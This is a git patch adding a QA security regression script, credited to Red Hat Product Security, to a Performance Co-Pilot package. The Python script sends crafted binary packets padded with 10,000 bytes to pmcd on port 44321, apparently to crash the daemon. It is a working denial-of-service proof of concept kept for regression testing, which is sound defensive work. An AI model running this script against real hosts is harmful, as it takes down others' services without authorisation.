From 47e6e7c84f008a53061e661f31ae96629bc694ef Mon Sep 17 00:00:00 2001 From: Igor Pashev Date: Sun, 26 Oct 2014 12:33:50 +0400 Subject: Debian 3.9.10 --- qa/secure/crash-pmns-names | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100755 qa/secure/crash-pmns-names (limited to 'qa/secure/crash-pmns-names') diff --git a/qa/secure/crash-pmns-names b/qa/secure/crash-pmns-names new file mode 100755 index 0000000..ebaff17 --- /dev/null +++ b/qa/secure/crash-pmns-names @@ -0,0 +1,16 @@ +# +# usage: python crash-pmns-names HOST +# +# Florian Weimer / Red Hat Product Security Team +# +import socket +import sys +_, host = sys.argv +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect((host, 44321)) +sock.send( + str("\x00\x00\x00\x14\x00\x00p\x0c\x00\x00\x00\x01\x00\x00\x00\x01\x01\x02\x00\x00") + + str("\x00\x00',\x00\x00p\x0e\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00'\x10") + + str("X") * 10000) + +sock.close() -- cgit v1.2.3